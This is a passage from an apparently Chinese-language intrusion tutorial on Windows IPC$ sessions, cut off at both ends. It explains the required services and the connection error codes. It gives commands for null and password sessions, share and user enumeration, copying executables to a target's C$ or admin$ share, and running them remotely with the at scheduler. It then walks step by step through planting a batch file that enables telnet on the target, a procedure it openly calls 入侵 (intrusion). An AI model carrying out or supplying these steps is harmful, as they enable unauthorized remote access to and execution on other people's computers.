服务（功能为提供网络链结和通讯）； 　　★ 目标主机必须要启动Lanmanserver服务（ipc$依赖于此服务，它提供了 RPC 支持、文件、打印以及命名管道共享）； 　　★ 目标主机必须要启动NetLogon，它支持网络上计算机 pass-through 帐户登录身份； 　　★ 目标主机应该启动NBT（打开139端口）； 　　★ 目标主机防火墙配置（如果屏蔽139和445端口也将导致连接失败）； 　　★ 用户名或者密码错误； 　　★ 命令输入错误（特别要注意空格的输入，用户名和密码中不包含空格时两边的双引号可以省略，密码为空，直接输入两个引号""）； 　　★ 建立好连接后目标主机重启，ipc$连接会自动断开。 　　四、连接错误号分析 　　错误号5： 拒绝访问，权限不够； 　　错误号51： 无法找到网络路径（网络有问题）； 　　错误号53： 找不到网络路径（ip地址错误；目标主机未开机；目标主机lanmanserver服务未启动；目标主机防火墙设置过滤端口）； 　　错误号67： 找不到网络名（本地主机中lanmanworkstation服务未启动或者目标主机删除了ipc$）； 　　错误号1219： 提供的凭据与已存在的凭据集冲突（已经建立了一个ipc$，可以删除再连）； 　　错误号1326： 用户名或密码错误； 　　错误号1792： 试图登录，网络登录服务没有启动（目标主机中NetLogon服务未启动）； 　　错误号2242： 该用户的密码已经过期。 　　五、常用口令 　　★ 建立空连接: net use \\IP\ipc$ "" /user:"" 　　★ 建立非空连接: net use \\IP\ipc$ "password" /user:"username" 　　★ 查看远程主机的共享资源（但看不到默认共享） net view \\IP 　　★ 查看本地主机的共享资源（可以看到本地的默认共享） net share 　　★ 得到远程主机的用户名列表 nbtstat -A IP 　　★ 得到本地主机的用户列表 net user 　　★ 查看远程主机的当前时间 net time \\IP 　　★ 显示本地主机当前服务 net start 　　★ 启动/关闭本地服务 net start 服务名 /y net stop 服务名 /y 　　★ 映射远程共享: net use z: \\IP\sihochina 此命令将共享名为sihochina的共享资源映射到z盘 　　★ 删除共享映射 net use z: /del /y 删除映射的z盘net use * /del /y 删除全部 　　★ 向远程主机复制文件 copy \路径\*.exe \\IP\共享目录名，如： copy sihochina.exe \\IP\c 将当前目录下的sihochina.exe复制到对方c盘内 　　★ 远程添加计划任务 at \\ip 时间 程序名，如： at \\192.168.0.1 11:00 sihochina.exe 11：00在主机192.168.0.1上运行sihochina.exe 　　本文所用的方法主要是在VISTA 旗舰版SP2以及XP SP2的环境下测试的，别的系统没做测试，不过相信都大同小异，出现的问题也应该差不多，我将列举我在两个系统的实验中所出现的所有问题供大家参考。 　　另外如果是初学者，对IPC及DOS命令毫无概念，请配合上一篇《IPC基础及IPC-DOS命令》一起阅读。 　　下面开始进入正题吧！ 　　第一步，按WIN+R弹出一个运行框（别告诉我说WIN键都不知道是哪一个，那没救了！就是打开开始菜单的那个键，上面有一个WINDOWS的标志的键），键入CMD，进入DOS中。 　　第二步，输入net use \\目标IP\ipc$ "密码" /user:"用户名"。输入完这个之后，将会显示命令成功完成的提示符。值的注意的是语法的格式问题。在这条语法中一共有四个空格。USE前后各有一个空格，密码前后各有一个空格。此外需要注意的是这里的用户名和密码是入侵主机的登录系统用的用户名和密码而非宽带拨号的那个。在这个过程中，如果目标机是VISTA系统的话，那么可以很轻松的入侵，因为VISTA系统中微软默认就把SERVER服务给开了，只要知道用户名和密码就可以进来。而XP中却是关闭的，如果别人用的是XP系统而你又只是做实验的话那就放弃吧。或者你还不死心，打个电话给别人叫别人开一下吧！别人问你怎么开怎么办？如果你也不知道的话，晕，算了，好人做到底了，我告诉你吧，免得你去百度上去找了。打开“控制面板-经典视图-管理工具-服务”在服务项目中找到SERVER那一项，然后自己想办法开启吧！要再不会，那我也没辙了！ 　　第三步，输入net view \\目标IP 查看一下目标开放了哪些共享。如果对方已将全部的盘上的资源都共享了的话，那么已经可以说入侵已经接近尾声了（在XP中默认开启的共享有：打印机什么的，而VISTA默认中几乎把所有的共享都开了）。但是如果对方没有开启共享的话那我们就得自己想办法来解决这个问题了。一般我们都是用telnet这项服务进入对方的电脑，然后帮他开启你想要的那些共享。那么怎么样进入telnet呢？这又是一个比较大的问题了。在XP中默认telnet服务是禁用的，也就是说你不可以用这项服务。而VISTA做的更绝，在服务项中都没有这一项，不过没关系我们可以自己加。具体方法如下：“控制面板-进入控制面板主页-打开或关闭WINDOWS功能（左下方）-在里面找到telnet两项都添加就行”。碰到这种情况，像我们这种做实验的类型的应该就要选择放弃了。如果你再打个电话叫对方把禁用去掉，改成自动的，那么情况又不一样了（修改方法和刚才开启SERVER差不多，这里就不详细介绍了），只要不是禁用，不管他的服务有没有开启我们都有办法把它变成开启的。下面我给大家介绍一个比较简单的方法。首先打开“记事本-在里面输入@net statr telnet"保存为opentelnet.bat放在C盘中吧！这里是用的一个批处理命令来实现的，具体怎么实现的在这里我就不多说了，因为今天的重点不是它。大家按做就行了，不过我可以告诉大家的是这个命令的效果就是打开停用的telnet服务（注意是停用的而非禁用的）。接下来我们要做的就是把这个文件复制到目标机的根目录中去。具体操作为： 　　第四步，输入 copy c:\opentelnet.bat \\目标IP\admin$ 这样我们就把刚才建的那个文件复制到对方主机的根目录中去了。不过在复制的过程中可能会出现在一些问题，我在向XP中上复制时就出现问题了，而且一直找不到问题出在哪，不过复制失败的原因具体有以下一些，我从网上找的，现在COPY过来。 　　复制文件的时候提示出错，原因可能有以下几个方面： 　　1）盲目复制： 　　复制根本就不存在的共享文件，复制前应使用net view \\IP命令查看目标主机的共享情况； 　　2）默认共享判断错误： 　　★ ipc$共享与默认共享是两码事，ipc$共享是一个命名管道，不是具体的文件夹，而默认共享并不是ipc$共享的必要条件； 　　★ net view \\IP 无法显示默认共享（因为默认共享带$），我们无法通过这个命令判断对方是否开启了默认共享。 　　3）用户权限不够： 　　★ 空连接向所有共享（默认共享和普通共享）复制时，大多情况下权限是不够的； 　　★ 向默认共享复制时，要具有管理员权限； 　　★ 向普通共享复制时，要具有相应权限（即目标主机预设的访问权限）； 　　★ 目标主机通过防火墙或安全软件的设置，禁止外部访问共享； 　　4）被防火墙杀死或在局域网 　　第五步，运行这个文件。就这要用到我们的at命令了。方法如下：首先看一下目标机的时